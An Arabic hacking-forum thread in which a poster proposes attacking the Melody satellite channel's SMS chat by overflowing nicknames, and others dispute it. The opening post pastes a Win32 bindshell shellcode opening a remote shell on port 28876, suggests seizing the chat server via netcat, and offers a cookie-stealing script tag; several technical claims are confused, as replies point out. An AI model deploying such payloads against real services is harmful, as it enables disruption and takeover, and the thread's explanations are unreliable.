• 0
bigboss1988

اختراق Chat القنوات الفضائيه!

سؤال

--------------------------------------------------------------------------------------------------------\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\/////////////////////////\\\\\\\\\\\\\\\\\\\//////////////

-------------------------------------------------------------------------------------------------------

بسم الله الرحمن الرحيم

هذا الموضوع قمت بكتابته فى الامن العربى من حوالى شهرين او شهر وتغيبت بسبب المرض والامتحنات وان شاء الله اكون متواجد معكم

على العموم الدرس هيبعد عن السلسله بحد ما ولكن مرتبط باول موضوع فيها

http://www.s4a.cc/forum/showthread.php?t=3202

طبعا فى ظل الظروف الراهنه والقنوات الفضائيه نازله ترخ على دماغتنا والفيديو كليب الى اكل

دماغ شبابنا ربنا يستر على الجيل ده جيل الديموقراطيه ...

الموضوع ده اكتشفته من حوالى سنه بس كنت بحاول اطور نفسى فيه يعنى مثلا افهم

لغه الchat وهى الجافا (java) التى تتعامل مع الجوال (الموبايل) انا لست برمجا جافا

من عمل رسائل مصوره بالفيديو والعاب الى اخره ....الهم

لنكون سباقين بالمواضيع عن الغرب نخش فى الموضوع ..

هتكون ضحيتنا قناه ميلودى الانجليزيه وليست العربيهmelody

كيف اتيت بالثغره؟!!

لكى تقو بتسجيل فى قناتنا يجب ان تضغط على ** ثم الاسم المستعار

تذكر الدرس السابق وتفهمه لكى تعرف كيف جاءت هذه الثغره لاتنزل لاسفل لتعرف الحل

اعرفها وبعد كده انزل لتحت

كيف جاءت الثغره؟!!

لب المشكله ياتى فى هاتين العلامتين ** لو حتى لا تفقه شىء فى لغه الjava ولا عمرك

سمعت عنها ولو يوجد عندك شويه معلوات بالمتغيرات او اى لغه اخرى مكن تعرفها زى بكل سهوله

عندما تضغط على هاتين العلامتين** يقو م بحجز متغير!!!

لماذا ليقو بالتسجيل اسمك المستعار بهذا الشكل **bigboss وبعد ان يقو م بالتسجيل فى القناه

يكون هكذا bigboss: كل شويه بقرب من النقطه المهمه

اعتقد ان النقطه بانت وواضح انها ثغره BuFFer OvErFloW ولاحظ ايضا ان المبرمج لم يتم اخذ

الامان !! سنعرفها اسفل ..

استغلال الثغره ؟!!

الاستغلال لحد وقتنا هذا لم اكتبه لانى لست مبرمج للجافا ولكن عندى طريق تعمل على حجب

خدمه الاتشات **aaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaa aaaaaaaaaeslam eslam bigboss

من القناه وهى كالاتى تقوم بالتسجيل باكتر من حرف فى المتغير هكذا ..

الى ان ينتهى بك الحال الى 255 حرف الى موجود عندك على الموبايل اعتقد او اقل من كده

وارسل وسجل وارسل اى رساله سيقوم الاتشات بالحجب وستلاحظ ايضا.. ان الاسم المستعار

طفح او عمل overflow على الاعلانات التى توجد بداخل القناه

طريقت اغلاقها ؟!!

طبعا القناه عرفت المشكله وقامو بغلق المتغير او ** الى 12 حرف

يجب الا يزيد عدد الحروف الاسم المستعار عن 12 حرف

طبعا اتقفلت الثغره وطبعا انا حابب انكم تجربوها على اكتر من قناه

تجاوز المشكله.؟!!

ممكن اتجاوز المشكله التى هى 12حرف بعمل الابتسمات على اسمك المستعار هكذا

** : ( اى ابتسامات وعدم كتابت اى حروف فى الاسم المستعار

ان بصراحه لسه ما جربتها ومستنيكم تجربوها لانى مشغول جداااااا حاليا والله يعلم بحالى

وممكن نرفق shell code بالجافا مثل هذا

# Win32 bindshell (port 28876) - SkyLined

my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".

"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u 31ea".

"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u 85c7".

"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u 8b4b".

"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u 8b64".

"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u 6c6c".

"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%u e8fe".

"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%u fec0".

"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u 5050".

"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u 31c6".

"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u 5650".

"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u 58fa".

"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%u c656".

"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u 41e1".

"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u 5353".

"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u 5353".

"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%u fffe".

"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u 56ff".

"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u 89eb\");\n";

اخذته من ثغرهhttp://www.milw0rm.com/id.php?id=1079

وناتى بالادوار الاحترافيه مثل نعرف رقم ip الجهاز الذى يعمل الchat عليه ثم نتصل بالNETCAT

ونسيطر على القناه ولكن هذه فعلا ادوار الهاكر المحترف والحقيقى ليخسر شركه زى

ميلودى او اى قناه اخرى...

وطريقه مثل كود الجافا خبيث مثل هذا <script>alert(document.cookie);</Script>

ارفقه فى الاسم المستعار واشتغل

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

26 إجابة على هذا السؤال .

  • 0

سلامات اخي bigboss1988

ومبروك على ثغرة : Internet Download Manager :)

--

جاري القرائة... والتعقيب على الموضوع...

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0
وناتى بالادوار الاحترافيه مثل نعرف رقم ip الجهاز الذى يعمل الchat عليه ثم نتصل بالNETCAT

ونسيطر على القناه  ولكن هذه فعلا ادوار الهاكر المحترف والحقيقى ليخسر شركه زى

ميلودى او اى قناه اخرى...

حلو. وبنصير بنعرض برامج عن قرصنة القنوات متل ما عمل الاخوين (نسيت الاسماء.. raz0r و ...) اللي ظهروا بفيلم "Hackers" مطلع العام 2000 على الـ MBC لاول مرة.. :lol: :D

تم تعديل بواسطه Xacker
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

و الله العظيم مثل هذه المواضيع تفتح شهيتي للغوص في هذا العالم لكن للأسف اقتربت الدراسة !!!!!!!!!!!

بس ان شاء الله الصيف القادم أهريكم أسئلة :D

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اخي bigboss1988 قرات الموضوع في الرابط السابق وكان في نقطه أحب اسأل فيها

وضعنا متغير باى قيمه ولتكن 10 انتبه !!!

نحن لم نقم بغلق المتغير وهنا تكمن المصيبه !!!

متغير المفتوح = 10 وطبعا الفراغ لانه مفتوح
كيف نحمى انفسنا من الBuFFer OverFlOw ?

الجواب من الصور سنقوم بغلق المتغير

أول مره اسمع عن شيء اسمه متغير مفتوح , ولا اعرف ماذا تقصد بغلقه

ما قرأته من قبل عن عملية الفيض في المتغيرات هو خطأ برمجي في عدم التحقق من طول النص المسموح به والموافق لطول المتغير

ويحدث هذا مثلا مع دوال القراءه من المستخدم أو من ملف أو نقل بيانات من مكان في الذاكره الى مكان آخر مباشرة دون التحقق من طول البيانات المسموحه للمتغير الهدف

وكمثال على هذا الداله sprintf في السي مثلا تقوم باعداد نص بصوره معينه وتضعه في متغير تم حجز مساحه محدده له مسبقا , ففي حالة ما كان النص المطلوب اعداده أكبر من المساحه المخصصه للمتغير فانه يحدث فيض في هذا المتغير

بدون اي تغيير في خصائص المتغير يتم معالجة المشكله باستخدام الداله snprintf حيث تأخذ في الحسبان طول المتغير فلا تتعداه في طول البيانات ولا ينتج فيض من هذه الداله

فالفيض يحدث نتيجه وضع داله غير مؤمنه في مواجهه مع المستخدم بشكل مباشر او غير مباشر.

أما من ناحية الدردشه على القنوات فالطريقه السابقه كانت رائعه وهذا لنهم لم يدركوا أهمية اختبار طول النص

ولكن بعد حصره على 12 حرف فهم الآن يقوما بقياس طول النص المسموح به , ولا اعتقد الابتسامات تجدي مع هذه الفكره لأن وبمنتهى البساطه الابتسامات ترسل على شكل مجموعة حروف فمثلا هذا الشكل :) يساوي : و ) أي حرفين , وهذا الشكل :lol: يساوي : و l , o , l , : أي 4 أحرف وهكذا

لذلك سيتم تقبل 12 حرف فقط بغض النظر عن ما يعنيه مجموعة الأحرف ولن يفهم وجود ابتسامات من غيره

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

الصراحة أنا لا أجد أن هذه ثغرة

و لي بعض التعليقات

لغه الchat وهى الجافا (java) التى تتعامل مع الجوال (الموبايل) انا لست برمجا جافا

هل تقصد ال J2ME ؟ اذا كان هذا ماتقصده فهذا مستحيل أن يكون برنامج الشات الخاص بالقناة مكتوب بالJ2ME

ثانياً الرسالة الSMS تكون بحد أقصى 160 حرف أي أنها لن تصل الى 255 حرف (حتى و ان وجدت في جوالك رسالة الSMS طولها 360 حرف) فانه في النهاية يُقسمها الى أكثر من رسالة كل رسالة حجمها 160 حرف

هذا و الله أعلم

كما أرجو أن تُنسق الشرح قليلاً

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

لاعتقد ان الثغره سوف تعمل .... كنت احاول ان اجعل جوال ال نوكيا 6600 يقوم بأرسال

اكثر من 160 حرف لكن لم استطع انظر ...

[email protected]:~# hcitool scan
Scanning ...
       00:0E:6D:15:D2:36       Qnix-nokia-6600

الان سوف اقوم بجعل الهاتف يعمل في جهازي على انه مودم خارجي

[email protected]:~# rfcomm bind 1 00:0E:6D:15:D2:36 1

[email protected]:~# rfcomm show
rfcomm1: 00:0E:6D:15:D2:36 channel 1 clean

انظر الان لقد قمت بعمل bind للجوال في جهازي على القناه رقم 1 انظر مواصفاتها

[email protected]:~# sdptool browse 00:0E:6D:15:D2:36
Service Name: Fax
Service RecHandle: 0x1001a
Service Class ID List:
 "Fax" (0x1111)
 "Generic Telephony" (0x1204)
Protocol Descriptor List:
 "L2CAP" (0x0100)
 "RFCOMM" (0x0003)
   Channel: 1
Language Base Attr List:
 code_ISO639: 0x656e
 encoding:    0x6a
 base_offset: 0x100
Profile Descriptor List:
 "Fax" (0x1111)
   Version: 0x0100

Service Name: Dial-up Networking
Service RecHandle: 0x1001b
Service Class ID List:
 "Dialup Networking" (0x1103)
 "Generic Networking" (0x1201)
Protocol Descriptor List:
 "L2CAP" (0x0100)
 "RFCOMM" (0x0003)
   Channel: 1

انظر الان سوف احاول ان ارسل ال 161 حرف وبعدها سوف اقوم بارسال رساله عاديه

[email protected]:~# dct /dev/rfcomm1 
rfcomm1> AT
OK (from nokia 6600)
rfcomm1> AT+CMGF=1
OK
rfcomm1> AT+CMGS="+9745******"
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+CMGS: 306
ERROR
rfcomm1> AT+CMGS="+9745******"
> Hello !!!
+CMGS: 64

ok

كما ترى لايقبل اكثر من 160 حرف ... ولكن قد توجد برامج او اي شئ يمكن ان يجعلها اكثر

"ملاحظه : قد تزيد الرساله اكثر من 160 حرف لكنها تعتبر صفحات او فيها فراغات يعني ماراح تساعد حتى لو ارسلت لها الاكبلوت او الاستغلال .... راح يخرب "

... ليس لدي الكثير من المعلومات حول هذه الاشياء ... لكن مافي شئ مستحيل !!!

تحياتي <_<

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0
اخي bigboss1988 قرات الموضوع في الرابط السابق وكان في نقطه أحب اسأل فيها

أول مره اسمع عن شيء اسمه متغير مفتوح , ولا اعرف ماذا تقصد بغلقه

ما قرأته من قبل عن عملية الفيض في المتغيرات هو خطأ برمجي في عدم التحقق من طول النص المسموح به والموافق لطول المتغير

ويحدث هذا مثلا مع دوال القراءه من المستخدم أو من ملف أو نقل بيانات من مكان في الذاكره الى مكان آخر مباشرة دون التحقق من طول البيانات المسموحه للمتغير الهدف

وكمثال على هذا الداله sprintf في السي مثلا تقوم باعداد نص بصوره معينه وتضعه في متغير تم حجز مساحه محدده له مسبقا , ففي حالة ما كان النص المطلوب اعداده أكبر من المساحه المخصصه للمتغير فانه يحدث فيض في هذا المتغير

بدون اي تغيير في خصائص المتغير يتم معالجة المشكله باستخدام الداله snprintf حيث تأخذ في الحسبان طول المتغير فلا تتعداه في طول البيانات ولا ينتج فيض من هذه الداله

اولا:-

المتغير المفتوح المقصود به :- (يمكن الاضافه له فى الذاكره ) ليتسبب فى حدوث الفيض

غلقه :- بمعنى عدم الاضافه فى الذاكره ويمكن غلقه بالبرمجه اذا زاد حجم متغير عن 10 يظهر رساله للمستخدم الحد المسموح له عشره

ويتم مسح الstring المدخل

ثانيا :- الفيض عمره ما بيحدث فى متغير!!!ولكن يحدث فى الذاكره(stack) او الكومه (heap)

مثلا:-

متغير يحمل القيمه 10

الحروف المدخله يجب ان تنتهى بالnull اى الصفر وهذا الصفر يقف فى بدايه الEBP عندما تزيد قيمت ال10 الى مثلا 20

ستتم عمليه الكتابه على الnull ثم على الEBP ثم فى الاخر على الEIP هذا موضوع الstack

أما من ناحية الدردشه على القنوات فالطريقه السابقه كانت رائعه وهذا لنهم لم يدركوا أهمية اختبار طول النص

ولكن بعد حصره على 12 حرف فهم الآن يقوما بقياس طول النص المسموح به , ولا اعتقد الابتسامات تجدي مع هذه الفكره لأن وبمنتهى البساطه الابتسامات ترسل على شكل مجموعة حروف فمثلا هذا الشكل :)  يساوي : و ) أي حرفين , وهذا الشكل  :lol:  يساوي : و l , o , l , : أي 4 أحرف وهكذا

لذلك سيتم تقبل 12 حرف فقط بغض النظر عن ما يعنيه مجموعة الأحرف ولن يفهم وجود ابتسامات من غيره

يا اخى هل رايتها امامك فى الشاشه عندما تدخل رمز يتحول الى شكل فى نفس الوقت!!!!

حجم الشكل اساسا اكبر من الحروف (المساحه) فيحتمل ان تاخذ مساحه اكبر من الحروف

--------=---------------------=----------------=----------------=--------

bashmohandes <-----------الصراحة أنا لا أجد أن هذه ثغرة

اومال ديه ايه؟؟؟؟ وضح كلامك وقولنا ايه الاسباب الى تخليك تقول كده وهل قمت بتجربتها؟؟؟؟على اى اساس بتقول ده؟؟؟؟؟

انا بقى يا سيدى جربتها :rolleyes:

طب وضح لينا لماذا لاتكتب برامج اتشات القنوات بالJ2ME؟؟؟هل قمت ببرمجت مثل هذه الاشياء من قبل؟؟؟؟

ثانيا:

طول الرساله 100 ولا حتى 200 حرف احنا الى عايزينه 20 او 30 حرف فقط لاننا مش هنكتب رساله!! ا

احنا هنكتب فى الاسم المستعار واساسا مبرمج شريط الاتشات اكيد محدد للاسم المستعار قيمه صغير مثلا 10 لو زادت عن حدها

هيحدث فيض فى الشريط والرسايل هتكتب على بعض !!! وهوه المطلوب اثباته :)

----------------------=----------------------------=----------------------=-----------=

اخ Qnix

المشكله ليست فى 130 حرف كما قولت سابقا نحن لانكتب رساله

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

السلام عليكم

اخى jaas

الله يبارك فيك وهذا الفضل يرجع لله ويرجع لى صديق لى وهو warur الذى قام مسبقا باكتشافها فى الاصدار القديم

واتحفنا بمواضيعك وثغراتك المايكروسوفتيه ;) واعتقد انها ستكون على الlonghorn ان شاء الله :)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

لن تكتب رساله ... لكن كيف ستطبق الاكسبلوت اساسا ....

لو كان remote شغله ماراح يمشي كيف راح ترسل المخرجات من الاكسبلوت الي المكان المصاب ؟

حتى لو كان ال ip للجهاز عندك ماراح تكون الشغله سهله ابدا ... لانه هاذي channel وماعتقد راح تكو الحمايه فيها

بهاذي البساطه !! ( لا اعلم عنها شئ )

فكيف ستطبقها لو امكنت ؟

على كل حال ... وفقك الله

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

الموضوع يحتاج الى

واحد مبرمج جافا كويس ليقوم بعمل shellcode مناسب يعنى لا يزيد حجمه عن 200 او اقل من هذا اى اى طرق اخرى

تم تعديل بواسطه bigboss1988
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

ياعم J2ME في القنوات ايه بس

احنا حنهرج الJ2MُE دي لغة برمجة داخل الأجهزة الذكية مثل أجهزة المحمول حتى لآ يمكن البرمجة بها للPC العادي فما بالك بنظام ضخم يخدم آلاف العملاء و يعمل 24/7 هذا غير منطقي

و أيضاً هناك نقطة

اسم المعرف سيتم تخزينه في Database أولاُ و داخل الDatabase تكون مساحة المعرف لن تزيد عن قيمة محددة و لن يمكنك كسرها و هكذا عندما يقوم النظام بالقراءة مرة أخرى من الDatabase سيقرأ المعرف بالحجم الأقصى بلا زيادة هذا لآن الDatabase ستقوم باهمال أي حروف زائدة عن الحد المسموح به...

وطريقه مثل كود الجافا خبيث مثل هذا <script>alert(document.cookie);</Script>

كود خبيث ايه بس يا راجل الكود ده محتاج parser عشان يشغله و الا سيكون مجرد كلام عادي من الاخر محتاج Browser و طبعاً لو كان الكود ده ليه أي قيمة ببساطة سيتم قبل قبول اسم المعرف اهمال أي علامات مثل < > فيصبح الكود بلا قيمة هذا بفرض أنه ذو قيمة أساساً

تم تعديل بواسطه bashmohandes
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0
ياعم J2ME في القنوات ايه بس

احنا حنهرج الJ2MُE دي لغة برمجة داخل الأجهزة الذكية مثل أجهزة المحمول حتى لآ يمكن البرمجة بها للPC العادي فما بالك بنظام ضخم يخدم آلاف العملاء و يعمل 24/7 هذا غير منطقي

و أيضاً هناك نقطة

اسم المعرف سيتم تخزينه في Database أولاُ و داخل الDatabase تكون مساحة المعرف لن تزيد عن قيمة محددة و لن يمكنك كسرها و هكذا عندما يقوم النظام بالقراءة مرة أخرى من الDatabase سيقرأ المعرف بالحجم الأقصى بلا زيادة هذا لآن الDatabase ستقوم باهمال أي حروف زائدة عن الحد المسموح به...

كود خبيث ايه بس يا راجل الكود ده محتاج parser عشان يشغله و الا سيكون مجرد كلام عادي من الاخر محتاج Browser و طبعاً لو كان الكود ده ليه أي قيمة ببساطة سيتم قبل قبول اسم المعرف اهمال أي علامات مثل < > فيصبح الكود بلا قيمة هذا بفرض أنه ذو قيمة أساساً

اولا انا لم اقل انها مصنوعه بالj2me ولكن كنت عايز اعرف السبب فقط لاغير وياريت لو تتكرم وتقولنا ديه متبرمجه بايه

ثانيا موضوع الداتا بيس ده حضرتك يا حج الباشموهندز مش هتطلع احسن من مكتشف الbuffer over فى الداتا بيس

وهو David Litchfield

ثالت حاجه :- بالنسبه لكود الجافا انا بطرح افكار هل ستنفذ ام لا طلعت مطلعتش اهم حاجه انها فكره قابله للتناقش

تم تعديل بواسطه bigboss1988
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

بغض النظر عن طريقتك في الحديث

ثانيا موضوع الداتا بيس ده حضرتك  مش هتطلع احسن من مكتشف الbuffer over فى الداتا بيس

ممكن حضرتك تقولنا أي Database بالضبط اللي تم اكتشاف ثغرات فيها .. (بالطبع جميع البرامج في الدنيا تحتوي ثغرات) و لكن لا يمكن ان تقول تم اكتشاف ثغرة في الDatabase ثم تسكت فهذا ليس خبراً يجب عليك أن تذكر اسم الDatabase

ثانياُ انت أيضاً لن تنافس David Litchfield فبلاش تجيب سيرته لأنه على الأقل كان منطقي و هو بيبحث عن الثغرة مش بيقول أي كلام غير منطقي

و ثانياً انا لا أعلم اللغة المستخدمة في برمجة أنظمة القنوات الفضائية و لكن هذا ليس بالشئ المهم ففي الأغلب هي ++C و هذا مثال على أحد هذه البرامج و يمكنك تحميل نسخة منه مجانية Demo و عمل Emulation للقناة

http://www.codesegment.com/index.htm

تم تعديل بواسطه bashmohandes
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

---------------------

ممكن حضرتك تقولنا أي Database بالضبط اللي تم اكتشاف ثغرات فيها .. (بالطبع جميع البرامج في الدنيا تحتوي ثغرات) و لكن لا يمكن ان تقول تم اكتشاف ثغرة في الDatabase ثم تسكت فهذا ليس خبراً يجب عليك أن تذكر اسم الDatabase

--------------------

Microsoft SQL server

------------------

ثانياُ انت أيضاً لن تنافس David Litchfield فبلاش تجيب سيرته لأنه على الأقل كان منطقي و هو بيبحث عن الثغرة مش بيقول أي كلام غير منطقي

و ثانياً انا لا أعلم اللغة المستخدمة في برمجة أنظمة القنوات الفضائية و لكن هذا ليس بالشئ المهم ففي الأغلب هي ++C و هذا مثال على أحد هذه البرامج و يمكنك تحميل نسخة منه مجانية Demo و عمل Emulation للقناة

-----------------

لا انافسه ونص اعتقد ان الله لم يخلق له عقلين !!

يا عم بلا منطقى بلاغير منطقى وشغل الكلام الى المبهم ده

يا عم الراجل كان بيكتشف و الداتا بيس فى ايده

اما العبد لله لم تتوافر معه البرنامج + لم اعرف اللغه

الحكايه انى مسكت طرف الخيط الى ممكن نستغل العمليه

واعتقد ان الى اخترع الطياره مش اختراعها من يوم وليله بل كانت العمليه تراكميه افكار تسلم افكار

ثالثا :- انتا ودنتا على منطقه ثانيه وهى الC++ واشكرك على بحثك وتفتيح السبل لكى نراها بمنظور اخر

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0
لا انافسه ونص اعتقد ان الله لم يخلق له عقلين !!

أنا لا أتكلم عن الذكاء بل أتكلم عن الخبرة و كمان لو راجعت كلامك فقد قلت موجهاً خطابك لي

ثانيا موضوع الداتا بيس ده حضرتك يا حج الباشموهندز مش هتطلع احسن من مكتشف الbuffer over فى الداتا بيس

ستجد انك قلت نفس الجملة لي و تتحدى أنني لن أنافسه و لكن يا سيدي تركنا لك المنافسة

يا عم بلا منطقى بلاغير منطقى وشغل الكلام الى المبهم ده

أيضاً بعيداً عن طريقتك في الحديث فبالفعل كلامك غير منطقي بالمرة فأنا لم أذكر أن الشات مصنوع بالJ2ME و انا لم أذكر انني يمكنني تنفيذ javascript على برنامج عادي..... و أيضاً لم أقل أنني سأكسر نظاماً لا أعرف عن تفاصيله أي شئ ... أعتقد أن هذا منطقي جداً

يا عم الراجل كان بيكتشف و الداتا بيس فى ايده

اما العبد لله لم تتوافر معه البرنامج + لم اعرف اللغه

أعتقد أن هذا دليل على أنه يجب أن تتوافر لك المعلومات الكافية عن النظام حتى تستطيع كسره و اكتشاف ثغراته فكل ماذكرته بعض افتراضات غير منطقية تم تعديل بواسطه bashmohandes
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

المتغير المفتوح المقصود به :- (يمكن الاضافه له فى الذاكره ) ليتسبب فى حدوث الفيض

غلقه :- بمعنى عدم الاضافه فى الذاكره ويمكن غلقه بالبرمجه اذا زاد حجم متغير عن 10 يظهر رساله للمستخدم الحد المسموح له عشره

هل هذا الكلام يوضح أن هناك ما يسمى متغير مفتوح ومتغير مغلق ؟ الاجابه لا

الواضح ان المتغير واحد وتم اعلانه بطريقه واحده , ولكن طريقة التعامل معه هي التي تغيرت , فبدلا من تمرير البينات اليه بغض النظر عن طولها يتم التأكد من الطول واخذ البيانات بالطول المناسب فقط و دون تغيير في حالة المتغير , اعتقد الكلام واضح وانتهى ولا يحتمل تأويل مره ثانيه

ثانيا :- الفيض عمره ما بيحدث فى متغير!!!ولكن يحدث فى الذاكره(stack) او الكومه (heap)

صلي على النبي الأول كده , وقولي الـ stack , heap عباره عن ايه ؟؟ والمتغيرات التي يتم انشائها داخل الدوال اي المتغيرات الخاصه , اين يتم انشائها ؟؟

شوف حتى ردك

متغير يحمل القيمه 10

الحروف المدخله يجب ان تنتهى بالnull اى الصفر وهذا الصفر يقف فى بدايه الEBP عندما تزيد قيمت ال10 الى مثلا 20

ستتم عمليه الكتابه على الnull ثم على الEBP ثم فى الاخر على الEIP هذا موضوع الstack

ارجوا مراجعة السمبلي اكثر من ذلك , لأن في لبس كبير في هذا التعليق , ولا تكن مصدار معلوماتك الوحيد هو دروس الكراك , لأن في الغالب بتكون بتشرح لناس لديها المعرفه السابقه بالأسمبلي

يا اخى هل رايتها امامك فى الشاشه عندما تدخل رمز يتحول الى شكل فى نفس الوقت!!!!

حجم الشكل اساسا اكبر من الحروف (المساحه) فيحتمل ان تاخذ مساحه اكبر من الحروف

يظهر لي من ردك أنك لم تفهم كلامي

اكرر مره ثانيه : الابتسامات ترسل مرمزه , كل شكل له رمز خاص به , وعند ارسال اسم المستخدم فان الطرف الآخر ينتظر منك 10 أحرف فقط , لنفرض ان خطتك ان ترسل له 10 ابتسامات بدل من 10 احرف

انت تنوي ان ترسل هذا الشكل

:D :lol: :lol: :D :( :( <_< <_< :angry: :angry:

وهي تمثل بــ

: D : l o l : : l o l :  : D : ( : ( < _ < < _ < : a n g r y : : a n g r y :

لن يقبل المستقبل سوى أول 10 حروف من هذه الرموز وهي

: D : l o l : : l o

فقطولن يفهم على انها ابتسامات أو غيره , بل من الممكن أن لا يقبلها اصل اذا كان البرنامج لا يقبل الحروف الخاصه مثل : مثلا

وبالتالي فالمحاوله من الأساس لا تصلح , هل اتضح المر أم لا ؟

رجاء لو وجد رد بالاعتراض تحاول توثق كلامك هذه المره , بحيث نعرف مصدر كلامك او براهينك علنا نستفيد

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

يا اخى العزيز انا مش بجيب كلام من بيتى ولا عمرى بافتى فى حاجه !!!

biffds.jpg

هل ده بيريحك؟؟؟

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

موضوع رائع و مناقشة ممتاة :) مفيد جدا

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

يا اخي لا انا هنا بغرض التشكيك في كلامك ولا العبث به أو إثبات أنك مخطئ , لكن واضح انك أخطأت فقت في طريقة الشرح , وهذا وارد

تقول الصوره التي ارفقتها

In this example the target BUFFER is used to overwrite into the SAVED EBP

أعتقد واضح أنه استخدم BUFFER وهو المتغير الذي تم تعريفه مؤقتا في الـ Stack

وحدثت عملية الـطفح في هذا المتغير في ال Stack مما أدى الى الكتابه على البيانات المحفوظه قبله , وفي هذه الحاله كانت البيانات المحفوظه قبله في الـ Stack هي بيانات EBP , اي أنه عند استرجاع قيمة EBP من الـ Stack ستكون بيانات غير صحيحه

فقط أنت علقت بصوره غير صحيحه في قولك

الفيض عمره ما بيحدث فى متغير!!!ولكن يحدث فى الذاكره(stack) او الكومه (heap)

و

الحروف المدخله يجب ان تنتهى بالnull اى الصفر وهذا الصفر يقف فى بدايه الEBP عندما تزيد قيمت ال10 الى مثلا 20

ستتم عمليه الكتابه على الnull ثم على الEBP ثم فى الاخر على الEIP هذا موضوع الstack

حيث انك تقول في الثانيه أن الكتابه تكون على EBP ثم EIP , وهي اصلا سجلات خاصه بالمعالج , وال EIP خاصة لا يمكن الكتابه عليه

ما يحدث هو الكتابه على قيمتها المحفوظه مؤقتا في الـ Stack لحين استرجاعها

واعتقد الجمله الاولى واضحه مثل الشمس , ولا تحتاج مني لتعليق

فقط اريد تنبيهك يا أخي فلا تأخذ كلامي على محمل تحدي أو استخفاف بقولك , فانا لم اقل أنك جايب الكلام ده من بيتك أو غيره , كل ما في الأمر أني طلبت المصادر لكي أعرف أين الخطأ

ويا رب تكون مشكلة الابتسامات وضحت

وآسف على مقاطعة موضوعك

تم تعديل بواسطه Asm4all
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

بصراحه انا شايف ان الموضوع ده غير منطقى بالمره

اولا لازم تقولنا معلومات عن الثغره دى وهى مكتوبه باى لغه

مش نخمن انها بالجافا او غيره وبعدين القنوات دى بيكون ليها انظمه كبيره بتشتغل عليها

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

-----------------------منقول

أعتقد واضح أنه استخدم BUFFER وهو المتغير الذي تم تعريفه مؤقتا في الـ Stack

وحدثت عملية الـطفح في هذا المتغير في ال Stack مما أدى الى الكتابه على البيانات المحفوظه قبله , وفي هذه الحاله كانت البيانات المحفوظه قبله في الـ Stack هي بيانات EBP , اي أنه عند استرجاع قيمة EBP من الـ Stack ستكون بيانات غير صحيحه

------------------------منقول

-

لماذا نحتاج استرجاع قيمت الEBP بدام عارفين ان الفيض كتب على البيانات ؟؟؟

-

-----------------------منقول

حيث انك تقول في الثانيه أن الكتابه تكون على EBP ثم EIP , وهي اصلا سجلات خاصه بالمعالج , وال EIP خاصة لا يمكن الكتابه عليه

ما يحدث هو الكتابه على قيمتها المحفوظه مؤقتا في الـ Stack لحين استرجاعها

واعتقد الجمله الاولى واضحه مثل الشمس , ولا تحتاج مني لتعليق

-----------------------منقول

In this example the target BUFFER is used to overwrite into the SAVED EBP

لو انتا قريت العنوان كويس او قراءت الصوره جيدا ستجد ان الكاتب لم ينوه عن قيم الEBP ولا حتى قيم الEIP لماذا؟!!

باعتبار الى بيقرا الموضوع فاهم اساسيات الاسمبلى وانا عملت كده بالضبط!! وايضا نقطه

